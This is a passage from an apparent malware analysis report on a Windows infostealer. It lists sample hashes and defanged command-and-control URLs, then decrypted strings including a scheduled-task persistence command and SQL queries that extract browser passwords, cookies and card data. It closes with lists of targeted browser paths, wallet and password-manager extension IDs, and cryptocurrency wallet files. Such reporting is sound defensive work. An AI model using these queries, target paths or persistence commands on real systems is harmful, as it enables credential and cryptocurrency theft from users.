| 21a8db193093caf6acbcd14ba64c98a1c9f16998cade8f60fa0fb4dc63e33bd2 | 2023-09-18 21:36:22 UTC | 2023-09-22T12:35:08 | mema | hxxp://5.42.92[.]211/loghub/master |
| 7003eadaef73ac1f2e0f0a86a3d1f5792a5dde3a45ba71e095861b55059b3780 | 2023-09-07 07:53:28 UTC | 2023-09-12T20:08:32 | tresk | hxxp://5.42.92[.]211/loghub/master |
| 00fe26cfe465740e61b99f105bcf2516ff49e117f23f4b508d5256c57fa3fc66 | 2023-06-26 05:51:47 UTC | 2023-07-24T18:48:13 | sup | hxxp://188.40.116[.]251:8005/loghub/master |

Appendix

Decrypted Malware Strings

  • %08lX%04lX%lu
  • %ix%i
  • %ls %ls
  • %ls [%ls %d] ERROR in %s, line %d, function %s. %s
  • %ls\\%ls
  • %ls\\%ls\\Local State
  • %ls\\*
  • %ls\\Web Data
  • %ls\\cookies.sqlite
  • %ls\\formhistory.sqlite
  • %ls\\places.sqlite
  • %s/%s
  • %userprofile%\\Telegram Desktop\\tdata
  • &&\" **(# +
  • &0'fg{199
  • (ov_(ov
  • ,+& ##*
  • -t{d2
  • ..*($2nd-2d-2o595
  • ..\\stealer\\chromiumbrowsers.cpp
  • ..\\stealer\\filesgrabber.cpp
  • ..\\stealer\\geckobrowsers.cpp
  • ..\\stealer\\httpclient.cpp
  • ..\\stealer\\loader.cpp
  • ..\\stealer\\sqlite3.cpp
  • ..\\stealer\\stealer.cpp
  • /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn \"\\WindowsAppPool\\%ls\"
  • LeaveCriticalSection
  • EnterCriticalSection
  • Advapi32.dll
  • Autofills/%ls_%ls.txt
  • Available KeyboardLayouts: Gonna gather system information
  • Build mark: 
  • CPU: 
  • Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
  • Can't obtain RmStartSession's address, maybe windows don't support RestartManager
  • Can't start process; last error: %x
  • Can't write file; last error: %x
  • Card: 
  • Chromium browsers paths were retrieved
  • ComSpec
  • Command line: %ls
  • ComputerName: 
  • Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
  • Content-Disposition: form-data; name=\"%s\"
  • Content-Length: %d
  • Content-Type: multipart/form-data; boundary=%s
  • Cookies
  • Cookies/%ls_%ls.txt
  • Country: {country}
  • CreditCards/%ls_%ls.txt
  • Current language: 
  • Default
  • Email
  • Email/Credentials.txt
  • Email: 
  • EnterCriticalSection
  • Expand path: %ls
  • Extensions were retrieved
  • FALSE
  • Failed to connect to %s
  • Failed to download sqlite3.dll
  • Failed to export functions from sqlite3.dll
  • Failed to load sqlite3.dll
  • Failed to retrieve chromium browsers paths
  • Failed to retrieve files grabber paths
  • Failed to retrieve gecko browsers paths
  • File Location: 
  • Files grabber paths were retrieved
  • FilesGrabber: Sent %ls
  • Find chromium cookies db %ls
  • Find chromium extension %ls with id %ls
  • Find chromium history db %ls
  • Find chromium login data db %ls
  • Find chromium web data db %ls
  • Find gecko autofills db %ls
  • Find gecko cookies db %ls
  • Find gecko file %ls
  • Find gecko history db %ls
  • Find steam data, path %ls
  • Gdi32.dll
  • Gecko browsers were retrieved
  • Gecko/%ls/%ls/%ls
  • GetModuleHandleA
  • Global\\%s%x
  • Gonna gather system information
  • Gonna grab ChromiumBrowsers
  • Gonna grab GeckoBrowsers
  • Gonna grab files
  • Gonna grab outlook
  • Gonna grab steam
  • Gonna grab telegrab
  • Gonna take screenshot
  • GrabFiles
  • HH':'mm':'ss
  • HWID: 
  • HandleChromiumBrowsers
  • HandleGeckoBrowsers
  • Hardwares: 
  • History/%ls_%ls.txt
  • Holder: 
  • HttpOpenRequest fails; last error: %x
  • HttpQueryInfo fails; last error: %x
  • IMAP Password
  • IP: {ip}
  • InitializeCriticalSection
  • InternetConnect fails; last error: %x
  • InternetCrackUrl fails; last error: %x
  • InternetOpen fails; last error: %x
  • Kernel32.dll
  • Key: 
  • LeaveCriticalSection
  • Location: {location}
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
  • Name: 
  • Network\\Cookies
  • Ntdll.dll
  • ..\\stealer\\geckobrowsers.cpp
  • Ole32.dll
  • Operation System: 
  • POP3 Password
  • Password: 
  • ProductName
  • Request
  • Retrieve rule FilesGrabber, server side path: %ls
  • Rstrtmgr.dll
  • Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
  • SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted FROM credit_cards
  • SELECT fieldname, value FROM moz_formhistory
  • SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  • SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies
  • SELECT origin_url, username_value, password_value FROM logins
  • SELECT title, url FROM moz_places
  • SELECT url, title FROM urlsFind chromium history db %ls
  • SMTP Server
  • ScreenSize: 
  • Screenshot.jpeg
  • Sent log. Gonna send done message
  • Sent screenshot
  • Software\\Microsoft\\Office
  • Software\\Valve\\Steam
  • Sq~70
  • SrartLoader
  • Start
  • SteamPath
  • Successfully connected to %s
  • Successfully start process
  • SystemInformation.txt
  • Telegram
  • There's file to load. Gonna load it
  • TimeZone: {timezone}
  • Title: 
  • Tkernel32.dll
  • Token retrieved: %s
  • Trying to connect to %s
  • URL: 
  • USERPROFILE|tELEGRAMdESKTOP|TDATA
  • Url: 
  • User32.dll
  • UserName: 
  • Username: 
  • Value: 
  • Wallets/%ls_%ls_%ls
  • Wininet.dllCrypt32.dll
  • Wininet.dllCrypt32.dllGdiplus.dll
  • Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
  • Write file content in %ls
  • Zip code: {zipcode}
  • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
  • build
  • cert8.db
  • cert9.db
  • chromium-browsers
  • computername
  • encrypted_key
  • extensions
  • filename
  • files
  • done
  • files
  • gecko-browsershi
  • Sent system information
  • kernel32.dll
  • key3.db
  • key4.db
  • loader
  • loghub/master
  • logins.json
  • msgtzn
  • SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
  • signons.sqlite
  • sqlite3
  • sqlite3_close
  • sqlite3_column_blob
  • sqlite3_column_bytes
  • sqlite3_column_text
  • sqlite3_open
  • sqlite3_open_v2
  • sqlite3_open_v2sqlite3_finalize
  • sqlite3_prepare_v2
  • sqlite3_step
  • token
  • username
  • wallets\\

Targeted Chromium Browsers

  • Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
  • Coowon|%localappdata%\Coowon\Coowon\User Data
  • Liebao|%localappdata%\liebao\User Data
  • QIP Surf|%localappdata%\QIP Surf\User Data
  • Orbitum|%localappdata%\Orbitum\User Data
  • Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
  • Amigo|%localappdata%\Amigo\User\User Data
  • Torch|%localappdata%\Torch\User Data
  • Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
  • Comodo|%localappdata%\Comodo\User Data
  • 360Browser|%localappdata%\360Browser\Browser\User Data
  • Maxthon3|%localappdata%\Maxthon3\User Data
  • K-Melon|%localappdata%\K-Melon\User Data
  • Sputnik|%localappdata%\Sputnik\Sputnik\User Data
  • Nichrome|%localappdata%\Nichrome\User Data
  • CocCoc|%localappdata%\CocCoc\Browser\User Data
  • Uran|%localappdata%\Uran\User Data
  • Chromodo|%localappdata%\Chromodo\User Data
  • Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
  • Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
  • Opera|%appdata%\Opera Software\Opera Stable
  • Google Chrome|%localappdata%\Google\Chrome\User Data
  • Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
  • Chromium|%localappdata%\Chromium\User Data
  • Opera|%localappdata%\Opera Software
  • ChromePlus|%localappdata%\MapleStudio\ChromePlus\User Data
  • Iridium|%localappdata%\Iridium\User Data
  • 7Star|%localappdata%\7Star\7Star\User Data
  • CentBrowser|%localappdata%\CentBrowser\User Data
  • Chedot|%localappdata%\Chedot\User Data
  • Vivaldi|%localappdata%\Vivaldi\User Data
  • Kometa|%localappdata%\Kometa\User Data
  • Elements Browser|%localappdata%\Elements Browser\User Data
  • Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
  • Uran|%localappdata%\uCozMedia\Uran\User Data
  • Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer

Targeted Gecko Browsers

  • Firefox|%appdata%\Mozilla\Firefox\Profiles
  • Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
  • BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
  • Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
  • K-Meleon|%appdata%\K-Meleon\Profiles
  • Icecat|%appdata%\Mozilla\icecat\Profiles

Targeted Browser Extensions

  • Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
  • Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
  • EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
  • Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
  • BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
  • iWallet|kncchdigobghenbbaddojjnnaogfppfj
  • Wombat|amkmjjmmflddogmhpjloimipbofnfjih
  • MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
  • GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
  • Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
  • Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
  • NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
  • CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
  • Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
  • Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
  • Keplr|dmkamcknogkgcdfhhbddcghachkejeap
  • Sollet|fhmfendgdocmcbmfikdcogofphimnkno
  • Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
  • Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
  • ICONex|flpiciilemghbmfalicajoolhkkenfel
  • Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
  • KHC|hcflpincpppdclinealmandijcmnkbgn
  • MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
  • TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
  • Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
  • Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
  • Nifty Wallet|jbdaocneiiinmjbjlgalhcelgbejmnid
  • Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
  • Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
  • TezBox|mnfifefkajgofkcjkemidiaecocnkjeh
  • DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
  • BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
  • Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
  • Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
  • Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
  • ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
  • Coin98 Wallet|aeachknmefphepccionboohckonoeemg
  • Authenticator|bhghoamapcdpbohphigoooaddinpkbai
  • Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
  • Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd
  • OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
  • LeafWallet|cihmoadaighcejopammfbmddcmdekcje
  • Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
  • EOS Authenticator|oeljdldpnmdbchonielidgobddffflal
  • GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
  • Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
  • Ever|cgeeodpfagjceefieflmdfphplkenlfk
  • KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
  • Rabby|acmacodkjbdgmoleebolmdjonilkdbch
  • Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
  • Oxygen|fhilaheimglignddkjgofkcbgekhenbh
  • Pali|mgffkfbidihjpoaomajlbgchddlicgpn
  • XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
  • Nami|lpfcbjknijpeeillifnkikgncikgfhdo
  • MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
  • Keeper|lpilbniiabackdjcionkobglmddfbcjo
  • Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
  • Govy|jnkelfanjkeadonecabehalmbgpfodjm
  • SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid
  • Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
  • Enkrypt|kkpllkodjeloidieedojogacfhpaihoh
  • OKX|mcohilncbfahbmgdjkbpemcciiolgcge
  • HashPack|gjagmgiddbbciopjhllkdnddhcglnemk
  • Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
  • Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
  • Martianin|efbglgofoippbgcjepnhiblaibcnclgk
  • Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
  • Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
  • Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
  • NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
  • Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
  • LastPass|hdokiejnpimakedhajhdlcegeplioahd
  • BrowserPass|naepdomgkenhinolocfifgehidddafch
  • MYKI|bmikpgodpkclnkgmnpphehdgcimmided

Targeted Cryptocurrency Wallets

  • Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
  • Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
  • Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
  • Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
  • Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
  • Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
  • Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
  • Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
  • Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
  • Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
  • Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
  • Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
  • Wallets/Ethereum|%appdata%\Ethereum|keystore|0
  • Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
  • Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
  • Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
  • Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
  • Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0